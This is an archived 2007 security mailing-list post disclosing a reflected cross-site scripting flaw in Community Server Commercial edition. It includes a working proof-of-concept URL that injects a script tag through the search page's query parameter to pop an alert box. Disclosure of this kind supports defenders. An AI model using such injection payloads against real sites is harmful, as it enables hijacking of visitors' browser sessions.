OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
XSS in communityserver !

bl4ckbsdmail.org
Date: Fri Feb 09 2007 - 15:38:28 CST


hey guys .. check out this new xss i just found ;P

Vulnerable : communityserver Commercial edition
web : http://communityserver.org/

XSS :

http://localhost/path/search/SearchResults.aspx?q=%22%3e%3cscript%3ealert(%27bl4ck%27)%3c%2fscript%3e&o=Relevance

Discovered By BLacK ZeRo
bL4ckbsdmail.org

Best regards ,,